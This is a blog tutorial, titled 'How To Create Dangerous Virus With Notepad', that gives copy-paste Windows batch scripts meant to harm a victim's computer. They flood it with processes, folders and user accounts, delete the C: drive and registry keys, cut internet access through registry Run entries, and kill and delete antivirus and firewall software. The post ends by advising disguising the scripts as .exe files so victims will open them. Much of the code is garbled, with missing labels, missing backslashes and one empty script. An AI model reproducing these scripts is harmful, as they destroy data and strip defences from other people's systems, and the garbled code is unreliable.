How To Create Dangerous Virus With Notepad

Viruses are malware which can cause a lot of harm to P.C., Computer and Laptop. Usually, they spread through sharing of files specially on Internet. Torrents file sharing and Email attachments are common ways to spread a virus.

Before going into detail, let me explain what a Batch File is? It is simply a text file, containing series of commands, which are executed automatically, line by line, when the batch file runs. I have used several commas to divide the sentence in many parts to make it easier to understand.

So, using Batch File you can create extremely dangerous viruses to delete the Windows files, format different drives(C:,D:,E:), steal information, disable firewalls.

Now, here are some small yet extremely dangerous Batch File viruses. You need to just press Ctrl+C (Copy) and Ctrl+V (Paste) code in Notepad. After that save the notepad file as “anyname.bat”. Be sure to use ‘.bat’ as extension otherwise it will not work.
1. Application Bomber:-
@echo off
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x

Function- Once executed, it will start to open different applications repeatedly which will affect system’s performance. You can also add application of your choice in above code.
2. Folder Flooder-

@echo off
md %random%
goto x

Function- Once executed, it will start to generate folders whose name can be any random number.
3. User Account Flooder:-

@echo off
user %random% /add
goto x

Function- Once executed it will start creating Windows User Accounts whose name can be any random number.
4. Process Creator:-


Function:- Once executed, it will start to generate a large number of processes very quickly resulting in hanging of P.C.
5. Internet Disabler:-

echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!

Function- Once executed, it will disable the internet connection of a computer permanently.
6. O.S. Hacker:-

@Echo off
Del C: *.* |y

Function:- Once executed it will format C disk drive and hence resulting in deleting the O.S. You can also replace C with any drive of your choice.
7. Registry Deleter:-

START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
ECHO Your computer has been hacked by cool hacker. Have a nice day. Enjoy!!!

Function:- Once executed it will delete registry files and leave a message. It can extremely affect the victim’s computer.
8. Crazy Caps Lock:-

Set wshShell
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”

Function:- Once executed it will turn Caps Lock continuously on and off annoying the user.
9. Anti Virus Disabler:-

@ echo off
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A spy*
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A SAFEWEB
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmincls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A syman*
tskill /A virus*
tskill /A realm*cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
tskill /A offg*
del /Q /F C:Program Filesalwils~1avast4*.*
del /Q /F C:Program FilesLavasoftAd-awa~1*.exe
del /Q /F C:Program Fileskasper~1*.exe
del /Q /F C:Program Filestrojan~1*.exe
del /Q /F C:Program Filesf-prot95*.dll
del /Q /F C:Program Filestbav*.datcls
del /Q /F C:Program Filesavpersonal*.vdf
del /Q /F C:Program FilesNorton~1*.cnt
del /Q /F C:Program FilesMcafee*.*
del /Q /F C:Program FilesNorton~1Norton~1Norton~3*.*
del /Q /F C:Program FilesNorton~1Norton~1speedd~1*.*
del /Q /F C:Program FilesNorton~1Norton~1*.*
del /Q /F C:Program FilesNorton~1*.*
del /Q /F C:Program Filesavgamsr*.exe
del /Q /F C:Program Filesavgamsvr*.exe
del /Q /F C:Program Filesavgemc*.exe
del /Q /F C:Program Filesavgcc*.exe
del /Q /F C:Program Filesavgupsvc*.exe
del /Q /F C:Program Filesgrisoft
del /Q /F C:Program Filesnood32krn*.exe
del /Q /F C:Program Filesnood32*.exe
del /Q /F C:Program Filesnod32
del /Q /F C:Program Filesnood32
del /Q /F C:Program Fileskav*.exe
del /Q /F C:Program Fileskavmm*.exe
del /Q /F C:Program Fileskaspersky*.*
del /Q /F C:Program Filesewidoctrl*.exe
del /Q /F C:Program Filesguard*.exe
del /Q /F C:Program Filesewido*.exe
del /Q /F C:Program Filespavprsrv*.exe
del /Q /F C:Program Filespavprot*.exe
del /Q /F C:Program Filesavengine*.exe
del /Q /F C:Program Filesapvxdwin*.exe
del /Q /F C:Program Fileswebproxy*.exe
del /Q /F C:Program Filespanda

Function:- Once executed it will disable the Anti Virus of the victim’s system.

Drawback of a batch file viruse is that any one can open it with notepad and read the command easily. Also, any one can delete it if they find it harmful. So, to overcome the limitation/drawback, you can use a cool tool named ‘Batch to Exe Converter’. It will convert the ‘.bat’ extension into ‘.exe’ extension. And your Batch file will be converted into an Application file. You can easily convince your victim to open the file.
A Personal Message To You

It is nice to see that you have gone through “Post Facebook Status in Future” completely. I hope you have enjoyed the article. However, if you want me to deliver more interesting hacking tutorials and article then please share my post(s). You can use Social Sharing Widget provided at the end of every post. After all, Sharing is Caring!!!
Thank you. Have a nice day ahead!!!

Post Author: admin_droidmegatech

Leave a Reply

Your email address will not be published. Required fields are marked *